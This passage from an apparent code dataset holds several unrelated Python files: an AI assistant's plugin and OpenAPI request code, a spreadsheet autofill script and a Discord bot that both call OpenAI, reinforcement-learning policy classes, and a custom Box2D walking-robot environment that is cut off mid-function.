return OpenAIPluginInfo(ai_plugin=ai_plugin, open_api=open_api)
@cached()
async def _parse_ai_plugin_conf(url: str) -> AIPluginConf:
async with aget(url) as response:
# content_type=None to disable validation, sometimes response comes as text/json
return parse_obj_as(
AIPluginConf, await response.json(content_type=None)
)
@cached()
async def _parse_openapi_spec(url: str) -> OpenAPISpec:
async with aget(url) as response:
return OpenAPISpec.from_text(await response.text()) # type: ignore
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~commands~run_plugin.py | from typing import List
from langchain.tools import APIOperation
from pydantic.main import BaseModel
from typing_extensions import override
from aidial_assistant.application.prompts import (
ADDON_BEST_EFFORT_TEMPLATE,
ADDON_SYSTEM_DIALOG_MESSAGE,
)
from aidial_assistant.chain.command_chain import (
CommandChain,
CommandConstructor,
)
from aidial_assistant.chain.history import History, ScopedMessage
from aidial_assistant.commands.base import (
Command,
ExecutionCallback,
ResultObject,
TextResult,
)
from aidial_assistant.commands.open_api import OpenAPIChatCommand
from aidial_assistant.commands.plugin_callback import PluginChainCallback
from aidial_assistant.commands.reply import Reply
from aidial_assistant.model.model_client import (
Message,
ModelClient,
ReasonLengthException,
)
from aidial_assistant.open_api.operation_selector import collect_operations
from aidial_assistant.utils.open_ai_plugin import OpenAIPluginInfo
class PluginInfo(BaseModel):
info: OpenAIPluginInfo
auth: str | None
class RunPlugin(Command):
def __init__(
self,
model_client: ModelClient,
plugins: dict[str, PluginInfo],
max_completion_tokens: int,
):
self.model_client = model_client
self.plugins = plugins
self.max_completion_tokens = max_completion_tokens
@staticmethod
def token():
return "run-addon"
@override
async def execute(
self, args: List[str], execution_callback: ExecutionCallback
) -> ResultObject:
self.assert_arg_count(args, 2)
name = args[0]
query = args[1]
return await self._run_plugin(name, query, execution_callback)
async def _run_plugin(
self, name: str, query: str, execution_callback: ExecutionCallback
) -> ResultObject:
if name not in self.plugins:
raise ValueError(
f"Unknown addon: {name}. Available addons: {[*self.plugins.keys()]}"
)
plugin = self.plugins[name]
info = plugin.info
ops = collect_operations(info.open_api, info.ai_plugin.api.url)
api_schema = "\n\n".join([op.to_typescript() for op in ops.values()]) # type: ignore
def create_command(op: APIOperation):
return lambda: OpenAPIChatCommand(op, plugin.auth)
command_dict: dict[str, CommandConstructor] = {}
for name, op in ops.items():
# The function is necessary to capture the current value of op.
# Otherwise, only first op will be used for all commands
command_dict[name] = create_command(op)
command_dict[Reply.token()] = Reply
history = History(
assistant_system_message_template=ADDON_SYSTEM_DIALOG_MESSAGE.build(
command_names=ops.keys(),
api_description=info.ai_plugin.description_for_model,
api_schema=api_schema,
),
best_effort_template=ADDON_BEST_EFFORT_TEMPLATE.build(
api_schema=api_schema
),
scoped_messages=[ScopedMessage(message=Message.user(query))],
)
chat = CommandChain(
model_client=self.model_client,
name="PLUGIN:" + name,
command_dict=command_dict,
max_completion_tokens=self.max_completion_tokens,
)
callback = PluginChainCallback(execution_callback)
try:
await chat.run_chat(history, callback)
return TextResult(callback.result)
except ReasonLengthException:
return TextResult(callback.result)
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~open_api~requester.py | import json
import logging
from typing import Dict, List, NamedTuple, Optional
import aiohttp.client_exceptions
from aiohttp import hdrs
from langchain.tools.openapi.utils.api_models import APIOperation
from aidial_assistant.commands.base import JsonResult, ResultObject, TextResult
from aidial_assistant.utils.requests import arequest
logger = logging.getLogger(__name__)
class _ParamMapping(NamedTuple):
"""Mapping from parameter name to parameter value."""
query_params: List[str]
body_params: List[str]
path_params: List[str]
class OpenAPIEndpointRequester:
"""Chain interacts with an OpenAPI endpoint using natural language.
Based on OpenAPIEndpointChain from LangChain.
"""
def __init__(self, operation: APIOperation, plugin_auth: str | None):
self.operation = operation
self.param_mapping = _ParamMapping(
query_params=operation.query_params, # type: ignore
body_params=operation.body_params, # type: ignore
path_params=operation.path_params, # type: ignore
)
self.plugin_auth = plugin_auth
def _construct_path(self, args: Dict[str, str]) -> str:
"""Construct the path from the deserialized input."""
path = self.operation.base_url.rstrip("/") + self.operation.path # type: ignore
for param in self.param_mapping.path_params:
path = path.replace(f"{{{param}}}", str(args.pop(param, "")))
return path
def _extract_query_params(self, args: Dict[str, str]) -> Dict[str, str]:
"""Extract the query params from the deserialized input."""
query_params = {}
for param in self.param_mapping.query_params:
if param in args:
query_params[param] = args.pop(param)
return query_params
def _extract_body_params(
self, args: Dict[str, str]
) -> Optional[Dict[str, str]]:
"""Extract the request body params from the deserialized input."""
body_params = None
if self.param_mapping.body_params:
body_params = {}
for param in self.param_mapping.body_params:
if param in args:
body_params[param] = args.pop(param)
return body_params
def deserialize_json_input(self, args: dict) -> dict:
"""Use the serialized typescript dictionary.
Resolve the path, query params dict, and optional requestBody dict.
"""
path = self._construct_path(args)
body_params = self._extract_body_params(args)
query_params = self._extract_query_params(args)
return {
"url": path,
"json": body_params,
"params": query_params,
}
async def execute(
self,
args: dict,
) -> ResultObject:
request_args = self.deserialize_json_input(args)
headers = (
None
if self.plugin_auth is None
else {hdrs.AUTHORIZATION: self.plugin_auth}
)
logger.debug(f"Request args: {request_args}")
async with arequest(
self.operation.method.value, headers=headers, **request_args # type: ignore
) as response:
if response.status != 200:
try:
return JsonResult(json.dumps(await response.json()))
except aiohttp.ContentTypeError:
method_str = str(self.operation.method.value) # type: ignore
error_object = {
"reason": response.reason,
"status_code": response.status,
"method:": method_str.upper(),
"url": request_args["url"],
"params": request_args["params"],
}
return JsonResult(json.dumps(error_object))
if "text" in response.headers[hdrs.CONTENT_TYPE]:
return TextResult(await response.text())
return JsonResult(json.dumps(await response.json()))
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~utils~requests.py | from contextlib import asynccontextmanager
from typing import AsyncIterator
from aiohttp import ClientResponse, ClientSession
@asynccontextmanager
async def arequest(
method: str, url: str, headers, **kwargs
) -> AsyncIterator[ClientResponse]:
async with ClientSession(headers=headers) as session:
async with session.request(method, url, **kwargs) as response:
yield response
# Cannot use Requests.aget(...) from langchain because of a bug: https://github.com/langchain-ai/langchain/issues/7953
@asynccontextmanager
async def aget(url: str, headers=None) -> AsyncIterator[ClientResponse]:
async with arequest("GET", url, headers) as response:
yield response
| [] |
2024-01-10 | weberam2/Jukebox | autofilljukebox.py | import pandas as pd
import openai
import os
path = "/home/weberam2/Dropbox/Personal_Misc/ChatGPT/Jukebox/JoF_filled2.xlsx"
df = pd.read_excel(path)
openai.api_key = os.environ["OPENAI_API_KEY"]
## Albums
albumnoentry = df.loc[pd.isna(df['year']), :].index
for album in albumnoentry:
prompt = "What album does the song " + df['Song'][album] + " by the artist " + df['Artist.1'][album] + " come from? Answer in the form: The album is called:' without quotes "
model = "text-davinci-003"
#model = "gpt-3.5-turbo"
print(prompt)
response = openai.Completion.create(engine=model, prompt=prompt, max_tokens=30)
generated_text = response.choices[0].text
print(generated_text)
albumguess = generated_text.split(":",1)[1]
albumguess = albumguess.strip()
print(albumguess)
df['Album'][album] = albumguess
# Year
yearnoentry = df.loc[pd.isna(df['year']), :].index
for year in yearnoentry:
prompt = "What year did the album " + df['Album'][year] + " by the artist " + df['Artist.1'][year] + " come out? Answer in the form: 'The year was:' without quotes "
model = "text-davinci-003"
#model = "gpt-3.5-turbo"
print(prompt)
response = openai.Completion.create(engine=model, prompt=prompt, max_tokens=50)
generated_text = response.choices[0].text
print(generated_text)
if ":" in generated_text:
yearguess = generated_text.split(":",1)[1]
elif "was " in generated_text:
yearguess = generated_text.split("was ",1)[1]
yearguess = yearguess.strip()
print(yearguess)
df['year'][year] = yearguess
genrenoentry = df.loc[pd.isna(df['genre']), :].index
for genre in genrenoentry:
prompt = "What genre is the album " + df['Album'][genre] + " by the artist " + df['Artist.1'][genre] + "? Answer in the form: 'The genre is:' without quotes "
model = "text-davinci-003"
#model = "gpt-3.5-turbo"
print(prompt)
response = openai.Completion.create(engine=model, prompt=prompt, max_tokens=50)
generated_text = response.choices[0].text
print(generated_text)
if ":" in generated_text:
genreguess = generated_text.split(":",1)[1]
elif "is " in generated_text:
genreguess = generated_text.split("was ",1)[1]
genreguess = genreguess.strip()
print(genreguess)
df['genre'][genre] = genreguess
df.to_excel(path) | [
"What year did the album ",
"What genre is the album ",
" by the artist ",
"? Answer in the form: 'The genre is:' without quotes ",
" come out? Answer in the form: 'The year was:' without quotes ",
"Song",
"What album does the song ",
" come from? Answer in the form: The album is called:' without quotes "
] |
2024-01-10 | Sraym1217/GPT4-discord-bot | discord_GPT_bot.py | import discord
import openai
from openai import OpenAI
import nest_asyncio
import asyncio
import os
from dotenv import load_dotenv
from keep_alive import keep_alive
import logging
import datetime
# 環境変数をロード
load_dotenv()
# Discord BotのトークンとOpenAI APIキーを環境変数から取得
# organization IDを環境変数から取得
TOKEN = os.getenv('DISCORD_TOKEN')
client_open = OpenAI(api_key = os.getenv('OPENAI_API_KEY'))
ORG_ID = os.getenv('OPENAI_ORG_ID')
# Discord Botのクライアントを作成
client = discord.Client(intents=discord.Intents.all())
async def keep_typing(channel):
while True:
await channel.typing()
await asyncio.sleep(4)
# Botが起動したときの処理
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord!')
# メッセージが送信されたときの処理
@client.event
async def on_message(message):
timestamp = datetime.datetime.now().isoformat()
# メッセージがBot自身によるもの、またはスレッド外のメッセージであれば無視
if message.author == client.user or not isinstance(message.channel, discord.Thread):
return
# スレッドの会話履歴を取得
conversation_history = ""
async for message_in_thread in message.channel.history(oldest_first=True):
author = "User" if message_in_thread.author != client.user else "Assistant"
conversation_history += f"{author}: {message_in_thread.content}\n"
# 文字数を確認
char_count = len(conversation_history)
if char_count > 127900:
# 文字数が127900を超えている場合、古い会話履歴を削除
char_to_remove = char_count - 127900 # 保持する文字数を調整
conversation_history = conversation_history[char_to_remove:]
typing_task = asyncio.ensure_future(keep_typing(message.channel))
try:
# OpenAI APIを使用して、メッセージに対する応答を生成する
# run_in_executor を使用して同期関数を非同期に実行する
response = await client.loop.run_in_executor(
None, # デフォルトのエグゼキュータを使用
lambda: client_open.chat.completions.create(
model="gpt-4",
messages=[
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": f"{conversation_history} \n Assistant:"},
],
)
)
# 応答を送信する
await message.channel.send(response.choices[0].message.content)
finally:
typing_task.cancel() # タスクをキャンセル
# Discord Botを起動する
keep_alive()
client.run(TOKEN)
| [
"You are a helpful assistant.",
"PLACEHOLDER \n Assistant:"
] |
2024-01-10 | joel99/midlevel-reps | gibson~gibson~utils~fuse_policy2.py | import numpy as np
import tensorflow as tf
from baselines.a2c.utils import conv, fc, conv_to_fc, batch_to_seq, seq_to_batch, lstm, lnlstm
from baselines.common.distributions import make_pdtype
import gym.spaces
## Fuse policy using PPO2 from OpenAI Baseline
class FusePolicy(object):
def __init__(self, sess, ob_space, sensor_space, ac_space, nbatch, nsteps, reuse=False): #pylint: disable=W0613
ob_shape = (nbatch,) + ob_space.shape
ob_sensor_shape = (nbatch,) + sensor_space.shape
actdim = ac_space.shape[0]
X_camera = tf.placeholder(tf.uint8, ob_shape, name='Ob_camera') #obs
X_sensor = tf.placeholder(tf.float32, ob_sensor_shape, name='Ob_sensor')
self.pdtype = make_pdtype(ac_space)
with tf.variable_scope("model", reuse=reuse):
h_camera = conv(tf.cast(X_camera, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2))
h2_camera = conv(h_camera, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3_camera = conv(h2_camera, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3_camera = conv_to_fc(h3_camera)
h4_camera = fc(h3_camera, 'fc1', nh=512, init_scale=np.sqrt(2))
pi_camera = fc(h4_camera, 'pi', actdim, init_scale=0.01)
vf_camera = fc(h4_camera, 'v', 1)[:,0]
self.pd = self.pdtype.pdfromflat(pi_camera)
with tf.variable_scope("model_sensor", reuse=reuse):
h1_sensor = fc(X_sensor, 'pi_fc1', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
h2_sensor = fc(h1_sensor, 'pi_fc2', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
pi_sensor = fc(h2_sensor, 'pi', actdim, init_scale=0.01)
h1_sensor = fc(X_sensor, 'vf_fc1', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
h2_sensor = fc(h1_sensor, 'vf_fc2', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
vf_sensor = fc(h2_sensor, 'vf', 1)[:,0]
with tf.variable_scope("model", reuse=reuse):
logstd = tf.get_variable(name="logstd", shape=[1, actdim],
initializer=tf.zeros_initializer())
X = tf.concat([X_camera, X_sensor], 0)
pi_full = tf.concat([pi_camera, pi_sensor], 0)
pi = fc(pi_full, 'pi', actdim, init_scale=0.01)
vf_full = tf.concat([vf_camera, vf_sensor], 0)
vf = fc(vf_full, 'vf', 1)[:,0]
pdparam = tf.concat([pi, pi * 0.0 + logstd], axis=1)
self.pd = self.pdtype.pdfromflat(pdparam)
a0 = self.pd.sample()
neglogp0 = self.pd.neglogp(a0)
self.initial_state = None
def step(ob, ob_sensor, *_args, **_kwargs):
a, v, neglogp = sess.run([a0, vf, neglogp0], {X_camera:ob, X_sensor: ob_sensor})
return a, v, self.initial_state, neglogp
def value(ob, ob_sensor, *_args, **_kwargs):
return sess.run(vf, {X_camera:ob, X_sensor: ob_sensor})
self.X = X
self.pi = pi
self.vf = vf
self.step = step
self.value = value
class CnnPolicy(object):
def __init__(self, sess, ob_space, ac_space, nbatch, nsteps, reuse=False, is_discrete=True): #pylint: disable=W0613
if isinstance(ac_space, gym.spaces.Discrete):
self.is_discrete = True
else:
self.is_discrete = False
print("nbatch%d" % (nbatch))
nh, nw, nc = ob_space.shape
ob_shape = (nbatch, nh, nw, nc)
if self.is_discrete:
nact = ac_space.n
else:
nact = ac_space.shape[0]
X = tf.placeholder(tf.uint8, ob_shape) #obs
with tf.variable_scope("model", reuse=reuse):
h = conv(tf.cast(X, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2))
h2 = conv(h, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3 = conv(h2, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3 = conv_to_fc(h3)
h4 = fc(h3, 'fc1', nh=512, init_scale=np.sqrt(2))
pi = fc(h4, 'pi', nact, init_scale=0.01)
vf = fc(h4, 'v', 1)[:,0]
if not self.is_discrete:
logstd = tf.get_variable(name="logstd", shape=[1, nact],
initializer=tf.zeros_initializer())
self.pdtype = make_pdtype(ac_space)
if self.is_discrete:
self.pd = self.pdtype.pdfromflat(pi)
a0 = self.pd.sample()
else:
pdparam = tf.concat([pi, pi * 0.0 + logstd], axis=1)
self.pd = self.pdtype.pdfromflat(pdparam)
a0 = self.pd.sample()
neglogp0 = self.pd.neglogp(a0)
self.initial_state = None
def step(ob, *_args, **_kwargs):
a, v, neglogp = sess.run([a0, vf, neglogp0], {X:ob})
assert(a.shape[0] == 1) # make sure a = a[0] don't throw away actions
a = a[0]
return a, v, self.initial_state, neglogp
def value(ob, *_args, **_kwargs):
return sess.run(vf, {X:ob})
self.X = X
self.pi = pi
self.vf = vf
self.step = step
self.value = value
class MlpPolicy(object):
def __init__(self, sess, ob_space, ac_space, nbatch, nsteps, reuse=False): #pylint: disable=W0613
ob_shape = (nbatch,) + ob_space.shape
actdim = ac_space.shape[0]
X = tf.placeholder(tf.float32, ob_shape, name='Ob') #obs
with tf.variable_scope("model", reuse=reuse):
h1 = fc(X, 'pi_fc1', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
h2 = fc(h1, 'pi_fc2', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
pi = fc(h2, 'pi', actdim, init_scale=0.01)
h1 = fc(X, 'vf_fc1', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
h2 = fc(h1, 'vf_fc2', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
vf = fc(h2, 'vf', 1)[:,0]
logstd = tf.get_variable(name="logstd", shape=[1, actdim],
initializer=tf.zeros_initializer())
pdparam = tf.concat([pi, pi * 0.0 + logstd], axis=1)
self.pdtype = make_pdtype(ac_space)
self.pd = self.pdtype.pdfromflat(pdparam)
a0 = self.pd.sample()
neglogp0 = self.pd.neglogp(a0)
self.initial_state = None
def step(ob, *_args, **_kwargs):
a, v, neglogp = sess.run([a0, vf, neglogp0], {X:ob})
return a, v, self.initial_state, neglogp
def value(ob, *_args, **_kwargs):
return sess.run(vf, {X:ob})
self.X = X
self.pi = pi
self.vf = vf
self.step = step
self.value = value | [] |
2024-01-10 | aadharna/watts | watts~utils~box2d~biped_walker_custom.py | # The following code is modified from openai/gym (https://github.com/openai/gym) under the MIT License.
# Modifications Copyright (c) 2020 Uber Technologies, Inc.
import sys
import math
import numpy as np
import Box2D
from Box2D.b2 import (edgeShape, circleShape, fixtureDef,
polygonShape, revoluteJointDef, contactListener)
import gym
from gym import spaces
from gym.utils import colorize, seeding
from collections import namedtuple
# This is simple 4-joints walker robot environment.
#
# There are two versions:
#
# - Normal, with slightly uneven terrain.
#
# - Hardcore with ladders, stumps, pitfalls.
#
# Reward is given for moving forward, total 300+ points up to the far end. If the robot falls,
# it gets -100. Applying motor torque costs a small amount of points, more optimal agent
# will get better score.
#
# Heuristic is provided for testing, it's also useful to get demonstrations to
# learn from. To run heuristic:
#
# python gym/envs/box2d/bipedal_walker.py
#
# State consists of hull angle speed, angular velocity, horizontal speed, vertical speed,
# position of joints and joints angular speed, legs contact with ground, and 10 lidar
# rangefinder measurements to help to deal with the hardcore version. There's no coordinates
# in the state vector. Lidar is less useful in normal version, but it works.
#
# To solve the game you need to get 300 points in 1600 time steps.
#
# To solve hardcore version you need 300 points in 2000 time steps.
#
# Created by Oleg Klimov. Licensed on the same terms as the rest of OpenAI Gym.
Env_config = namedtuple('Env_config', [
'name',
'ground_roughness',
'pit_gap',
'stump_width', 'stump_height', 'stump_float',
'stair_height', 'stair_width', 'stair_steps'
])
DEFAULT_ENV = Env_config(name='default_env',
ground_roughness=0,
pit_gap=[],
stump_width=[],
stump_height=[],
stump_float=[],
stair_height=[],
stair_width=[],
stair_steps=[])
FPS = 50
SCALE = 30.0 # affects how fast-paced the game is, forces should be adjusted as well
MOTORS_TORQUE = 80
SPEED_HIP = 4
SPEED_KNEE = 6
LIDAR_RANGE = 160 / SCALE
INITIAL_RANDOM = 5
HULL_POLY = [
(-30, +9), (+6, +9), (+34, +1),
(+34, -8), (-30, -8)
]
LEG_DOWN = -8 / SCALE
LEG_W, LEG_H = 8 / SCALE, 34 / SCALE
VIEWPORT_W = 600
VIEWPORT_H = 400
TERRAIN_STEP = 14 / SCALE
TERRAIN_LENGTH = 200 # in steps
TERRAIN_HEIGHT = VIEWPORT_H / SCALE / 4
TERRAIN_GRASS = 10 # low long are grass spots, in steps
TERRAIN_STARTPAD = 20 # in steps
FRICTION = 2.5
HULL_FD = fixtureDef(
shape=polygonShape(vertices=[(x / SCALE, y / SCALE)
for x, y in HULL_POLY]),
density=5.0,
friction=0.1,
categoryBits=0x0020,
maskBits=0x001, # collide only with ground
restitution=0.0) # 0.99 bouncy
LEG_FD = fixtureDef(
shape=polygonShape(box=(LEG_W / 2, LEG_H / 2)),
density=1.0,
restitution=0.0,
categoryBits=0x0020,
maskBits=0x001)
LOWER_FD = fixtureDef(
shape=polygonShape(box=(0.8 * LEG_W / 2, LEG_H / 2)),
density=1.0,
restitution=0.0,
categoryBits=0x0020,
maskBits=0x001)
class ContactDetector(contactListener):
def __init__(self, env):
contactListener.__init__(self)
self.env = env
def BeginContact(self, contact):
if self.env.hull == contact.fixtureA.body or self.env.hull == contact.fixtureB.body:
self.env.game_over = True
for leg in [self.env.legs[1], self.env.legs[3]]:
if leg in [contact.fixtureA.body, contact.fixtureB.body]:
leg.ground_contact = True
def EndContact(self, contact):
for leg in [self.env.legs[1], self.env.legs[3]]:
if leg in [contact.fixtureA.body, contact.fixtureB.body]:
leg.ground_contact = False
class BipedalWalkerCustom(gym.Env):
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second': FPS
}
def __repr__(self):
return "{}\nenv\n{}".format(self.__dict__, self.__dict__["np_random"].get_state())
def __init__(self, env_config):
self.spec = None
self.set_env_config(env_config)
self.env_params = None
self.env_seed = None
self._seed()
self.viewer = None
self.world = Box2D.b2World()
self.terrain = None
self.hull = None
self.prev_shaping = None
self.fd_polygon = fixtureDef(
shape=polygonShape(vertices=[(0, 0),
(1, 0),
(1, -1),
(0, -1)]),
friction=FRICTION)
self.fd_edge = fixtureDef(
shape=edgeShape(vertices=[(0, 0),
(1, 1)]),
friction=FRICTION,
categoryBits=0x0001,
)
self._reset()
high = np.array([np.inf] * 24)
self.action_space = spaces.Box(
np.array([-1, -1, -1, -1]), np.array([+1, +1, +1, +1]), dtype=np.float64)
self.observation_space = spaces.Box(-high, high, dtype=np.float64)
def set_env_config(self, env_config):
self.config = env_config
def augment(self, params):
self.env_params = params
def _set_terrain_number(self):
self.hardcore = False
self.GRASS = 0
self.STUMP, self.STAIRS, self.PIT = -1, -1, -1
self._STATES_ = 1
if self.config.stump_width and self.config.stump_height and self.config.stump_float:
# STUMP exist
self.STUMP = self._STATES_
self._STATES_ += 1
if self.config.stair_height and self.config.stair_width and self.config.stair_steps:
# STAIRS exist
self.STAIRS = self._STATES_
self._STATES_ += 1
if self.config.pit_gap:
# PIT exist
self.PIT = self._STATES_
self._STATES_ += 1
if self._STATES_ > 1:
self.hardcore = True
def save_env_def(self, filename):
import json
a = {'config': self.config._asdict(), 'seed': self.env_seed}
with open(filename, 'w') as f:
json.dump(a, f)
def seed(self, seed=None):
return self._seed(seed)
def _seed(self, seed=None):
self.env_seed = seed
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _destroy(self):
if not self.terrain:
return
self.world.contactListener = None
for t in self.terrain:
self.world.DestroyBody(t)
self.terrain = []
self.world.DestroyBody(self.hull)
self.hull = None
for leg in self.legs:
self.world.DestroyBody(leg)
self.legs = []
self.joints = []
self.world = None
def _generate_terrain(self, hardcore):
# GRASS, STUMP, STAIRS, PIT, _STATES_ = range(5)
state = self.GRASS
velocity = 0.0
y = TERRAIN_HEIGHT
counter = TERRAIN_STARTPAD
oneshot = False
self.terrain = []
self.terrain_x = []
self.terrain_y = []
pit_diff = 0
epsilon = 3e-3
for i in range(TERRAIN_LENGTH):
x = i * TERRAIN_STEP
self.terrain_x.append(x)
if state == self.GRASS and not oneshot:
velocity = 0.8 * velocity + 0.01 * np.sign(TERRAIN_HEIGHT - y)
if self.env_params is not None and self.env_params.altitude_fn is not None:
y += velocity
if i > TERRAIN_STARTPAD:
mid = TERRAIN_LENGTH * TERRAIN_STEP / 2.
x_ = (x - mid) * np.pi / mid
y = TERRAIN_HEIGHT + self.env_params.altitude_fn((x_,))[0]
if i == TERRAIN_STARTPAD + 1:
y_norm = self.env_params.altitude_fn((x_,))[0]
y -= y_norm
else:
if i > TERRAIN_STARTPAD:
velocity += self.np_random.uniform(-1, 1) / SCALE # 1
# input parameter: ground_roughness
# ground_roughness = 1
y += self.config.ground_roughness * velocity
elif state == self.PIT and oneshot:
# input parameter: pit_gap
# pit_gap = self.np_random.randint(3, 5) #counter is the control of the GAP distance
# counter = pit_gap
# counter = self.np_random.randint(*self.config.pit_gap)
pit_gap = 1.0 + self.np_random.uniform(*self.config.pit_gap)
counter = np.ceil(pit_gap)
pit_diff = counter - pit_gap
poly = [
(x, y),
(x + TERRAIN_STEP, y),
(x + TERRAIN_STEP, y - 4 * TERRAIN_STEP),
(x, y - 4 * TERRAIN_STEP + epsilon),
]
self.fd_polygon.shape.vertices = poly
t = self.world.CreateStaticBody(
fixtures=self.fd_polygon)
t.color1, t.color2 = (1, 1, 1), (0.6, 0.6, 0.6)
self.terrain.append(t)
self.fd_polygon.shape.vertices = [
(p[0] + TERRAIN_STEP * pit_gap, p[1]) for p in poly]
t = self.world.CreateStaticBody(
fixtures=self.fd_polygon)
t.color1, t.color2 = (1, 1, 1), (0.6, 0.6, 0.6)
self.terrain.append(t)
counter += 2
original_y = y
elif state == self.PIT and not oneshot:
y = original_y
if counter > 1:
y -= 4 * TERRAIN_STEP
if counter == 1:
self.terrain_x[-1] = self.terrain_x[-1] - pit_diff * TERRAIN_STEP
pit_diff = 0
elif state == self.STUMP and oneshot:
# input parameter stump_width, stump_height, stump_float
# stump_width = self.np_random.uniform(*self.config.stump_width)
stump_width = self.np_random.randint(*self.config.stump_width)
stump_height = self.np_random.uniform(
*self.config.stump_height)
stump_float = self.np_random.randint(*self.config.stump_float)
# counter = np.ceil(stump_width)
counter = stump_width
countery = stump_height
poly = [
(x, y + stump_float * TERRAIN_STEP),
(x + stump_width * TERRAIN_STEP, y + stump_float * TERRAIN_STEP),
(x + stump_width * TERRAIN_STEP, y + countery *
TERRAIN_STEP + stump_float * TERRAIN_STEP),
(x, y + countery *
TERRAIN_STEP + stump_float * TERRAIN_STEP + epsilon),
]
self.fd_polygon.shape.vertices = poly
t = self.world.CreateStaticBody(
fixtures=self.fd_polygon)
t.color1, t.color2 = (1, 1, 1), (0.6, 0.6, 0.6)
self.terrain.append(t)
elif state == self.STAIRS and oneshot:
# input parameters: stair_height, stair_width, stair_steps
stair_height = self.np_random.uniform(
*self.config.stair_height)
stair_slope = 1 if self.np_random.rand() > 0.5 else -1
stair_width = self.np_random.randint(*self.config.stair_width)
stair_steps = self.np_random.randint(*self.config.stair_steps)
original_y = y
for s in range(stair_steps):
poly = [
(x + (s * stair_width) * TERRAIN_STEP, y +
(s * stair_height * stair_slope) * TERRAIN_STEP),
(x + ((1 + s) * stair_width) * TERRAIN_STEP, y +
(s * stair_height * stair_slope) * TERRAIN_STEP),
(x + ((1 + s) * stair_width) * TERRAIN_STEP, y +
(-stair_height + s * stair_height * stair_slope) * TERRAIN_STEP),
(x + (s * stair_width) * TERRAIN_STEP, y + (-stair_height +
s * stair_height * stair_slope) * TERRAIN_STEP + epsilon),
]
self.fd_polygon.shape.vertices = poly
t = self.world.CreateStaticBody(
fixtures=self.fd_polygon)
t.color1, t.color2 = (1, 1, 1), (0.6, 0.6, 0.6)
self.terrain.append(t)
counter = stair_steps * stair_width + 1
elif state == self.STAIRS and not oneshot:
s = stair_steps * stair_width - counter
n = s // stair_width
y = original_y + (n * stair_height * stair_slope) * TERRAIN_STEP - \
(stair_height if stair_slope == -1 else 0) * TERRAIN_STEP
oneshot = False
self.terrain_y.append(y)
counter -= 1
if counter == 0:
counter = self.np_random.randint(
TERRAIN_GRASS / 2, TERRAIN_GRASS)
if state == self.GRASS and hardcore:
state = self.np_random.randint(1, self._STATES_)
oneshot = True
else:
state = self.GRASS
oneshot = True
self.terrain_poly = []
for i in range(TERRAIN_LENGTH - 1):
poly = [
(self.terrain_x[i], self.terrain_y[i]),
(self.terrain_x[i + 1], self.terrain_y[i + 1])
]
self.fd_edge.shape.vertices = poly
t = self.world.CreateStaticBody(
fixtures=self.fd_edge)
color = (0.3, 1.0 if i % 2 == 0 else 0.8, 0.3)
t.color1 = color
t.color2 = color
self.terrain.append(t)
color = (0.4, 0.6, 0.3)
poly += [(poly[1][0], 0), (poly[0][0], 0)]
self.terrain_poly.append((poly, color))
self.terrain.reverse()
def _generate_clouds(self):
# Sorry for the clouds, couldn't resist
self.cloud_poly = []
for i in range(TERRAIN_LENGTH // 20):
x = self.np_random.uniform(0, TERRAIN_LENGTH) * TERRAIN_STEP
y = VIEWPORT_H / SCALE * 3 / 4
poly = [
(x + 15 * TERRAIN_STEP * math.sin(3.14 * 2 * a / 5) + self.np_random.uniform(0, 5 * TERRAIN_STEP),
y + 5 * TERRAIN_STEP * math.cos(3.14 * 2 * a / 5) + self.np_random.uniform(0, 5 * TERRAIN_STEP))
for a in range(5)]
x1 = min([p[0] for p in poly])
x2 = max([p[0] for p in poly])
self.cloud_poly.append((poly, x1, x2))
def reset(self):
return self._reset()
def _reset(self):
self._destroy()
self.world = Box2D.b2World()
self.world.contactListener_bug_workaround = ContactDetector(self)
self.world.contactListener = self.world.contactListener_bug_workaround
self.game_over = False
self.prev_shaping = None
self.scroll = 0.0
self.lidar_render = 0
W = VIEWPORT_W / SCALE
H = VIEWPORT_H / SCALE
self._set_terrain_number()
self._generate_terrain(self.hardcore)
self._generate_clouds()
init_x = TERRAIN_STEP * TERRAIN_STARTPAD / 2
init_y = TERRAIN_HEIGHT + 2 * LEG_H
self.hull = self.world.CreateDynamicBody(
position=(init_x, init_y),
fixtures=HULL_FD
)
self.hull.color1 = (0.5, 0.4, 0.9)
self.hull.color2 = (0.3, 0.3, 0.5)
self.hull.ApplyForceToCenter(
(self.np_random.uniform(-INITIAL_RANDOM, INITIAL_RANDOM), 0), True)
self.legs = []
self.joints = []
for i in [-1, +1]:
leg = self.world.CreateDynamicBody(
position=(init_x, init_y - LEG_H / 2 - LEG_DOWN),
angle=(i * 0.05),
fixtures=LEG_FD
)
leg.color1 = (0.6 - i / 10., 0.3 - i / 10., 0.5 - i / 10.)
leg.color2 = (0.4 - i / 10., 0.2 - i / 10., 0.3 - i / 10.)
rjd = revoluteJointDef(
bodyA=self.hull,
bodyB=leg,
localAnchorA=(0, LEG_DOWN),
localAnchorB=(0, LEG_H / 2),
enableMotor=True,
enableLimit=True,
maxMotorTorque=MOTORS_TORQUE,
motorSpeed=i,
lowerAngle=-0.8,
upperAngle=1.1,
)
self.legs.append(leg)
self.joints.append(self.world.CreateJoint(rjd))
lower = self.world.CreateDynamicBody(
position=(init_x, init_y - LEG_H * 3 / 2 - LEG_DOWN),
angle=(i * 0.05),
fixtures=LOWER_FD
)
lower.color1 = (0.6 - i / 10., 0.3 - i / 10., 0.5 - i / 10.)
